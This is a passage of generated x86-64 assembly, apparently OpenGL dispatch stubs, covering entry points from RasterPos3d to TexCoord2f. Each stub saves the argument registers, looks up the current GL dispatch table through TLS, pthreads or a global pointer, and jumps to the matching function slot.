movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 560(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3d), .-GL_PREFIX(RasterPos3d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3dv)
.type GL_PREFIX(RasterPos3dv), @function
GL_PREFIX(RasterPos3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 568(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3dv), .-GL_PREFIX(RasterPos3dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3f)
.type GL_PREFIX(RasterPos3f), @function
GL_PREFIX(RasterPos3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 576(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3f), .-GL_PREFIX(RasterPos3f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3fv)
.type GL_PREFIX(RasterPos3fv), @function
GL_PREFIX(RasterPos3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 584(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3fv), .-GL_PREFIX(RasterPos3fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3i)
.type GL_PREFIX(RasterPos3i), @function
GL_PREFIX(RasterPos3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3i), .-GL_PREFIX(RasterPos3i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3iv)
.type GL_PREFIX(RasterPos3iv), @function
GL_PREFIX(RasterPos3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 600(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3iv), .-GL_PREFIX(RasterPos3iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3s)
.type GL_PREFIX(RasterPos3s), @function
GL_PREFIX(RasterPos3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3s), .-GL_PREFIX(RasterPos3s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos3sv)
.type GL_PREFIX(RasterPos3sv), @function
GL_PREFIX(RasterPos3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 616(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos3sv), .-GL_PREFIX(RasterPos3sv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4d)
.type GL_PREFIX(RasterPos4d), @function
GL_PREFIX(RasterPos4d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 624(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4d), .-GL_PREFIX(RasterPos4d)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4dv)
.type GL_PREFIX(RasterPos4dv), @function
GL_PREFIX(RasterPos4dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 632(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4dv), .-GL_PREFIX(RasterPos4dv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4f)
.type GL_PREFIX(RasterPos4f), @function
GL_PREFIX(RasterPos4f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 640(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4f), .-GL_PREFIX(RasterPos4f)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4fv)
.type GL_PREFIX(RasterPos4fv), @function
GL_PREFIX(RasterPos4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 648(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4fv), .-GL_PREFIX(RasterPos4fv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4i)
.type GL_PREFIX(RasterPos4i), @function
GL_PREFIX(RasterPos4i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4i), .-GL_PREFIX(RasterPos4i)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4iv)
.type GL_PREFIX(RasterPos4iv), @function
GL_PREFIX(RasterPos4iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4iv), .-GL_PREFIX(RasterPos4iv)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4s)
.type GL_PREFIX(RasterPos4s), @function
GL_PREFIX(RasterPos4s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 672(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4s), .-GL_PREFIX(RasterPos4s)
.p2align 4,,15
.globl GL_PREFIX(RasterPos4sv)
.type GL_PREFIX(RasterPos4sv), @function
GL_PREFIX(RasterPos4sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 680(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RasterPos4sv), .-GL_PREFIX(RasterPos4sv)
.p2align 4,,15
.globl GL_PREFIX(Rectd)
.type GL_PREFIX(Rectd), @function
GL_PREFIX(Rectd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 688(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectd), .-GL_PREFIX(Rectd)
.p2align 4,,15
.globl GL_PREFIX(Rectdv)
.type GL_PREFIX(Rectdv), @function
GL_PREFIX(Rectdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 696(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectdv), .-GL_PREFIX(Rectdv)
.p2align 4,,15
.globl GL_PREFIX(Rectf)
.type GL_PREFIX(Rectf), @function
GL_PREFIX(Rectf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 704(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectf), .-GL_PREFIX(Rectf)
.p2align 4,,15
.globl GL_PREFIX(Rectfv)
.type GL_PREFIX(Rectfv), @function
GL_PREFIX(Rectfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 712(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectfv), .-GL_PREFIX(Rectfv)
.p2align 4,,15
.globl GL_PREFIX(Recti)
.type GL_PREFIX(Recti), @function
GL_PREFIX(Recti):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Recti), .-GL_PREFIX(Recti)
.p2align 4,,15
.globl GL_PREFIX(Rectiv)
.type GL_PREFIX(Rectiv), @function
GL_PREFIX(Rectiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectiv), .-GL_PREFIX(Rectiv)
.p2align 4,,15
.globl GL_PREFIX(Rects)
.type GL_PREFIX(Rects), @function
GL_PREFIX(Rects):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rects), .-GL_PREFIX(Rects)
.p2align 4,,15
.globl GL_PREFIX(Rectsv)
.type GL_PREFIX(Rectsv), @function
GL_PREFIX(Rectsv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 744(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Rectsv), .-GL_PREFIX(Rectsv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1d)
.type GL_PREFIX(TexCoord1d), @function
GL_PREFIX(TexCoord1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 752(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1d), .-GL_PREFIX(TexCoord1d)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1dv)
.type GL_PREFIX(TexCoord1dv), @function
GL_PREFIX(TexCoord1dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 760(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1dv), .-GL_PREFIX(TexCoord1dv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1f)
.type GL_PREFIX(TexCoord1f), @function
GL_PREFIX(TexCoord1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 768(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1f), .-GL_PREFIX(TexCoord1f)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1fv)
.type GL_PREFIX(TexCoord1fv), @function
GL_PREFIX(TexCoord1fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 776(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1fv), .-GL_PREFIX(TexCoord1fv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1i)
.type GL_PREFIX(TexCoord1i), @function
GL_PREFIX(TexCoord1i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 784(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1i), .-GL_PREFIX(TexCoord1i)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1iv)
.type GL_PREFIX(TexCoord1iv), @function
GL_PREFIX(TexCoord1iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 792(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1iv), .-GL_PREFIX(TexCoord1iv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1s)
.type GL_PREFIX(TexCoord1s), @function
GL_PREFIX(TexCoord1s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 800(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1s), .-GL_PREFIX(TexCoord1s)
.p2align 4,,15
.globl GL_PREFIX(TexCoord1sv)
.type GL_PREFIX(TexCoord1sv), @function
GL_PREFIX(TexCoord1sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 808(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord1sv), .-GL_PREFIX(TexCoord1sv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2d)
.type GL_PREFIX(TexCoord2d), @function
GL_PREFIX(TexCoord2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 816(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2d), .-GL_PREFIX(TexCoord2d)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2dv)
.type GL_PREFIX(TexCoord2dv), @function
GL_PREFIX(TexCoord2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 824(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2dv), .-GL_PREFIX(TexCoord2dv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2f)
.type GL_PREFIX(TexCoord2f), @function
GL_PREFIX(TexCoord2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
